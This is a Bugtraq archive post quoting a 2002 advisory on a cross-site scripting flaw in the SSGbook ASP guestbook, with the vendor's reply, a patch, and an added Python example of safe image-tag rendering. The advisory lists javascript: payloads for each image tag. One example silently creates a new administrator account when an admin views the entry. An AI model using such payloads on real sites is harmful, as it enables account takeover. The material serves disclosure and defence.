Bugtraq mailing list archives

Re: SSGbook (ASP)


From: Terry Bankert <tbankert () script-shed com>
Date: 1 Oct 2003 21:11:44 -0000

In-Reply-To: <F127ak1HTJcwXAtPyFC00019ee5 () hotmail com>

This issue has been fixed

X-Originating-IP: [80.236.134.100]
From: "Frog Man" <leseulfrog () hotmail com>
To: bugtraq () securityfocus com
Subject: SSGbook (ASP)
Date: Tue, 08 Oct 2002 19:31:54 +0200
Message-ID: <F127ak1HTJcwXAtPyFC00019ee5 () hotmail com>

Information :
°°°°°°°°°°°°°°
Product : SSGbook
Language : ASP
Tested version : 1
Website : http://www.script-shed.com
Problem : Cross Site Scripting

PHP Code / location :
°°°°°°°°°°°°°°°°°°°°°
----------------- config.asp ----------------------
fString = doCode(fString, "[img]","[/img]","<img src=""",""" border=0>")
fString = doCode(fString, "[image]","[/image]","<img src=""",""" border=0>")
fString = doCode(fString, "[img=right]","[/img=right]","<img align=right src=""",""" id=right border=0>")
fString = doCode(fString, "[image=right]","[/image=right]","<img align=right src=""",""" id=right border=0>")
fString = doCode(fString, "[img=left]","[/img=left]","<img align=left src=""",""" id=left border=0>")
fString = doCode(fString, "[image=left]","[/image=left]","<img align=left src=""",""" id=left border=0>")
----------------- config.asp ----------------------

Exploit :
°°°°°°°°°
[image]javascript:{SCRIPT}[/image]
[img=right]javascript:{SCRIPT}[/img=right]
[image=right]javascript:{SCRIPT}[/image=right]
[img=left]javascript:{SCRIPT}[/img=left]
[image=left]javascript:{SCRIPT}[/image=left]
[img]javascript:{SCRIPT}[/img]


e.g. :
[image]javascript:document.location="ss_admin.asp?Mode=Update&Acton=Access&UserName=Pom&Password=turlututu";[/image]

Adds an admin if an admin reads it. Login : Pom, Password : turlututu

Patch :
°°°°°°°
In config.asp :
Add this line :

 strOutput = Replace(strOutput, chr(34), "&quot;")

after

----------------------------------------------
 strOutput = Replace(strOutput, "<", "&lt;")
 strOutput = Replace(strOutput, ">", "&gt;")
----------------------------------------------

And replace these lines :


------------------------------------------------
      fString = doCode(fString, "[img]","[/img]","<img src=""",""" border=0>")
      fString = doCode(fString, "[image]","[/image]","<img src=""",""" border=0>")
      fString = doCode(fString, "[img=right]","[/img=right]","<img align=right src=""",""" id=right border=0>")
      fString = doCode(fString, "[image=right]","[/image=right]","<img align=right src=""",""" id=right border=0>")
      fString = doCode(fString, "[img=left]","[/img=left]","<img align=left src=""",""" id=left border=0>")
      fString = doCode(fString, "[image=left]","[/image=left]","<img align=left src=""",""" id=left border=0>")
------------------------------------------------


by :

------------------------------------------------
      fString = doCode(fString, "[img]http://","[/img]",";<img src=""http://","""; border=0>")
      fString = doCode(fString, "[image]http://","[/image]",";<img src=""http://","""; border=0>")
      fString = doCode(fString, "[img=right]http://","[/img=right]",";<img align=right src=""http://","""; id=right border=0>")
      fString = doCode(fString, "[image=right]http://","[/image=right]",";<img align=right src=""http://","""; id=right border=0>")
      fString = doCode(fString, "[img=left]http://","[/img=left]",";<img align=left src=""http://","""; id=left border=0>")
      fString = doCode(fString, "[image=left]http://","[/image=left]",";<img align=left src=""http://","""; id=left border=0>")
------------------------------------------------




More details in French :
http://www.frog-man.org/tutos/SSGbook.txt

translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FSSGbook.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools


frog-m@n


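Added example (not code from the advisory, from SSGbook, or from script-shed.com): a Python rendering of the [img]/[image] tag handling that shows the substitution the advisory describes next to a defensive rewrite. do_code_naive() approximates doCode() as plain token replacement (an assumption; the real function is not on the page). render() parses the tag, accepts only image URLs whose parsed scheme is http or https, and HTML-escapes both the surrounding text and the src attribute, so a javascript: URL is left as inert text and a double quote inside a URL cannot close the attribute. All sample inputs are constructed.

```python
# Added example (not from the advisory, SSGbook or script-shed.com):
# naive BBCode image substitution next to a defensive rewrite.
import html
import re
from urllib.parse import urlsplit


def do_code_naive(text, open_tag, close_tag, html_open, html_close):
    """Approximation of SSGbook's doCode() as plain token replacement
    (assumption: the real function is not shown on the page).  Whatever
    sits between the tags lands unchanged inside the src attribute."""
    return text.replace(open_tag, html_open).replace(close_tag, html_close)


# [img]...[/img], [image]...[/image], and the =left/=right variants.
IMG_TAG = re.compile(
    r"\[(img|image)(?:=(left|right))?\](.*?)\[/\1(?:=\2)?\]",
    re.IGNORECASE | re.DOTALL,
)

ALLOWED_SCHEMES = {"http", "https"}


def safe_image_url(candidate):
    """Return the URL if it parses with an allowed scheme and a host,
    otherwise None.  Checking the parsed scheme (not a literal prefix)
    rejects javascript: and scheme-less values alike, in any letter case."""
    candidate = candidate.strip()
    parts = urlsplit(candidate)
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.netloc:
        return None
    return candidate


def _image_html(match):
    align = match.group(2)
    url = safe_image_url(match.group(3))
    if url is None:
        # Unsafe URL: show the tag as literal text instead of markup.
        return html.escape(match.group(0), quote=True)
    attrs = f' align="{align.lower()}"' if align else ""
    # quote=True turns " into &quot; so the value cannot close the attribute
    # (the same effect as the chr(34) Replace in the posted patch).
    return f'<img src="{html.escape(url, quote=True)}"{attrs} border="0">'


def render(text):
    """HTML-escape everything that is not a recognised image tag and
    emit <img> only for tags whose URL passed safe_image_url()."""
    out, pos = [], 0
    for m in IMG_TAG.finditer(text):
        out.append(html.escape(text[pos:m.start()], quote=True))
        out.append(_image_html(m))
        pos = m.end()
    out.append(html.escape(text[pos:], quote=True))
    return "".join(out)


if __name__ == "__main__":
    # Constructed sample inputs.
    payload = "[img]javascript:alert(1)[/img]"
    print(do_code_naive(payload, "[img]", "[/img]", '<img src="', '" border=0>'))
    print(render(payload))
    print(render("Hi <b>[image=left]https://example.com/x.gif[/image=left]"))
```

Compared with the posted patch, which matches a literal http:// prefix in the open tag and adds a Replace of chr(34) with &quot;, parsing the URL and allowlisting the scheme also accepts https and is not tied to the exact spelling of the prefix, and escaping at the point the attribute is built covers every tag variant at once instead of relying on the earlier global Replace.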



